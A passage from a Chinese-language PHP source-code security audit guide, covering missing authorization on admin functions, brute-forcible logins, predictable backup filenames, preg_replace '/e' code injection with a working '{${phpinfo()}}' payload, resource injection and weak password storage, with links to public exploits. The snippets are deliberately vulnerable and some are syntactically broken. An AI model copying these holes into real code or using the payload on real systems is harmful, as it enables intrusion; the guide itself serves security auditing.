一些管理目錄下的文件本來是禁止訪問的,但因爲程序員忘記對這些文件進行驗證,以至漏洞的發生。攻擊者必須對存在此問題的文件進行檢測。當PHP程序在未經許可的狀況下調用管理函數時,攻擊者可調用這些函數:  
#index.php <?php 
include ("Function.php"); $action=$_GET['action']; 
if ($action == $actionArray[$action][0])) { #load proper Function with $_GET ... } ?> 
 
#Function.php <?php 
$actionArray = array( 
'activate' => array('Register, 'Activate'), 'admin' => array('Admin', 'Admin'), 'upload'=> array('Post', 'upload'), 'ban' => array('ManageBans', 'Ban), ); 
function Forum (){ #Authorize Function ... } 
Function upload (){ 
# admin function without Permission ... } } 
本例中攻擊者可在未經許可的狀況下加載管理函數: # index.php?action=upload

14 – 經過暴力破解繞過登錄驗證 (Low): 

當程序員未對嘗試登錄失敗的次數進行檢測時,攻擊者能夠在一些登錄頁面上經過暴力破解繞過驗證。 

 

 


注意:當一個懶惰的程序員使用basic authentication來保護他/她的控制面板時,這將給攻擊者提供一次暴力破解的機會。  
<?php 
if (!isset($_SERVER['PHP_AUTH_USER'])) { 
header('WWW-Authenticate: Basic realm="My Realm"'); header('HTTP/1.0 401 Unauthorized'); 
echo 'Text to send if user hits Cancel button'; exit; } else { 
echo "<p>Hello {$_SERVER['PHP_AUTH_USER']}.</p>"; 
echo "<p>You entered {$_SERVER['PHP_AUTH_PW']} as your password.</p>"; } ?> 
攻擊實例: 
大部分的商業管理系統(CMS),例如:OS-commerce (在某些版本中)。

15 –不安全的隨機命名Session / Cookie / 備份文件(Medium): 

在命名session & cookie &備份文件時,將其隨機化,可能會出賣它們。 例如: 
<?php 
$rnd = rand(1,100); 
$fp = fopen($rnd.'_backup_.sql', 'w'); fwrite($fp, $db ); fclose($fp); ?> 
本例中:將備份文件寫入到"$rand_backup_.sql"中。在代碼第2行中,咱們能夠看到$rand參數,它隨機生成1-100之間的任意數。攻擊者可寫入代碼以暴力破解文件名。所以當咱們在生成Session & Cookie的時候,應當謹慎地使用隨機函數。  
攻擊實例: 
PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit: http://www.milw0rm.com/exploits/1068

16 – HTML Comment中提供的詳細信息 (Low): 

HTML標籤可用於尋蹤WEB程序或者泄漏WEB程序結構。  
17 – 默認安裝的多餘文件 (medium): 
一些PHP CMS或者WEB程序在安裝完成後並無刪除安裝文件,致使攻擊者能夠控制其中的數據或者重設管理員密碼。

18 – 正則表達式(Regular Expression)漏洞(High): 

Regular Expression Injection或者RegEx Injection經過替換正則表達式中的修飾符e而將代碼注入到WEB程序中。Perl支持這個修飾符,其它技術包括PCRE(Perl-compatible regular expressions) library。若是該漏洞被使用,其替換內容是可估計的。這種方法很強大,由於它不只容許使用變量名,並且支持其它命令。  
Example (RoundCube Bug): 
RoundCube使用了html2text函數,它存在一個評論漏洞:用戶輸入的數據可被PHP引擎分析並執行。這將致使一些被惡意構造的輸入數據被WEB服務器看成PHP代碼來執行。這個漏洞是因爲PHP中使用的preg_replace()函數用了'e' flag而致使的。在正則表達式中使用’e’將容許PHP對輸入數據進行處理。例如咱們想將小寫字符串更改成大寫的,可使用如下代碼: 
<?php 
print preg_replace('/(.*)/e', 'strtoupper("\\1")', 'test'); ?> 
preg_replace函數容許程序員使用PHP中的strtoupper ()函數去處理輸入的字符串,這將致使用戶能夠輸入包含PHP命令的字符串,以至形成不良後果。 
利用該漏洞最絕的一招就是將PHP命令假裝成變量來執行它們。在正常的操做中,preg_replace容許用戶在變量中傳輸並替換它們。例如:  
<?php 
$foo = 'bar'; 
print preg_replace('/(.*)/e', 'strtoupper("\\1")', '$foo'); ?> 
 
將輸出預料中的「BAR」。但當使用:  
<?php 
$foo = 'bar'; 
print preg_replace('/(.*)/e', 'strtoupper("\\1")', 'phpinfo()'); ?> 
 
將會簡單地輸出"PHPINFO()"。爲了使PHP引擎去解釋命令,咱們必須將其分配給一個變量。一般能夠簡單地使用一個'$'做爲分隔符,並用上PHP大括號,因而: 
<?php 
print ${phpinfo()}; ?> 
 
將盡職地輸出phpinfo()命令的輸出結果。但若是咱們將其發送給原先的preg_replace()函數,那麼將會發生錯誤,你會注意到: 
<?php 
print preg_replace('/(.*)/e', 'strtoupper("\\1")', '${phpinfo()}'); ?> 

 

 


產生了下列錯誤: 
[Tue Jan 13 09:24:48 2009] [error] [client 192.168.0.50] PHP Fatal error: preg_replace() [<a href='function.preg-replace'>function.preg-replace</a>]: Failed evaluating code: \nstrtoupper("${phpinfo()}") in /var/www/html/exploit.php on line 22  
爲了不發生錯誤,咱們須要再添加一個大括號,以執行賦予的命令。更改後的代碼以下: 
<?php 
print preg_replace('/(.*)/e', 'strtoupper("\\1")', '{${phpinfo()}}'); ?> 
RoundCube漏洞出如今bin/html2text.sh中的行6中: 
$converter = new html2text(html_entity_decode($HTTP_RAW_POST_DATA, ENT_COMPAT, 'UTF-8'));  
攻擊實例: 
Analysis of the RoundCube html2text Vulnerability http://www.milw0rm.com/exploits/7549 
http://www.securiteam.com/exploits/6W00L0KC0I.html  
更多信息: 
http://hauser-wenz.de/playground/papers/RegExInjection.pdf 

19 – Resource Injection (Medium): 

當遇到下面兩種狀況時資源注入漏洞就發生了: 1. 攻擊者能夠指定標識符去訪問系統資源。 
例如攻擊者能夠指定一個端口號去鏈接網絡資源。 
2. 經過指定資源,攻擊者能夠得到本來並未許可的權限。 例如程序可能會容許攻擊者發送敏感信息給第三方服務端。 下面看一看關於此漏洞更爲詳細的路徑操做描述。 
Example:下列代碼中讀取了HTTP request中的hostname,並使用它去鏈接決定票價的數據庫。 
 <?php 
$host=$_GET['host']; 
$dbconn = pg_connect("host=$host port=1234 dbname=ticketdb"); ... 
$result = pg_prepare($dbconn, "my_query", 'SELECT * FROM pricelist WHER E name = $1'); 
$result = pg_execute($dbconn, "my_query", array("ticket")); ?> 
 
這類可被用戶的輸入數據影響到的資源意味着這類內容存在危險。例如,數據中包含特定的字符,好比句號,斜杆,反斜杆,當使用這種可危害到文件系統的方式時都是存在風險的。

 

 


同時,包含URL和URI的數據對於建立遠程鏈接也是存在風險的。  
攻擊實例: 
Synthetic Attack [XSS , RI ] : 
http://www.milw0rm.com/exploits/7866  
20 – 弱口令: (Low) 
你必須檢查一下: 
- 你在數據庫中使用未加密的明碼。 - 加密密碼(例如:MD5),但還不夠安全。 
- 保存密碼在[.txt, .ini, .xml...]等文件中,這些文件都有可能被攻擊者讀取到。 - 
使用弱口令。 
例如password.xml(可被攻擊者讀取)  
攻擊: 
Http://viktim.com/password.xml  
<?xml version="1.0" ?> <novo-xml> <register> 
<client-id>test</client-id> 
<password>'.$username.'</password> <user-id>'.$password.'</user-id> <phone-num>'.$phone.'</phone-num> <app-id>test</app-id> <channel>I</channel> 
<user-type>upgrade</user-type> </register> </novo-xml>  
經過 password.xml進行認證:  
Login.php 
<form method="post" action="login.php"> Username: <input type="text" name="username"> <br /> 
Password: <input type="password" name="password"> <br /> 
<input type="submit" name="submit" value="Login"> </form>  <?php 
$file = "password.xml"; 

 

 


$username = $_POST[‘username’]; $password = $_POST[‘password’]; if (file_exists($file)) { 
$xml = simplexml_load_file($file); $count = 0; 
foreach($xml->username as $currUser) { 
if (strtolower($currUser) == strtolower($username)) { break; } 
$count++; 

if ($xml->active[$count] == 1) { 
if (md5($password) == $xml->password[$count]) { 
echo "Valid user logged in!"; }else{ 
echo "Password does not match. Come on! Try harder!"; } 
} else{ 
echo "User is inactive. Choose another!"; 
} }else{ 
echo "Critical Error: File not found!"; } ?> 
 
攻擊實例: 
Passwords Decrypted for UPB <= 1.9.6: 
http://www.securityfocus.com/bid/13975/exploit

  2- Rats [free] : http://www.fortify.com/security-resources/rats.jsp 3- Pixy [sqli – xss] : http://pixybox.seclab.tuwien.ac.at/  問題: 本文並未徹底涉及PHP源碼安全檢閱(審計),因爲時間倉促,所以對於文中所形成的錯誤表示抱歉。筆者沒法保證,但有可能會發布本文的下一版本,以包含更多高級的方法。 下面是一些可能在下一版本中會被討論到的內容: 1- 更多的攻擊實例 2- PHPIDS防護 3- 更爲危險的函數:CURL – socket – creat_function & …. 4- 討論一些函數的安全使用 5- 關於PHP安全編程書籍的相關信息 6- ETC  資源: http://www.fortify.com http://wikipedia.com http://www.madirish.net http://www.owasp.org http://samate.nist.gov/ http://searchsecuritychannel.techtarget.com/ http://www.webappsec.org http://phpsec.org

相關文章
相關標籤/搜索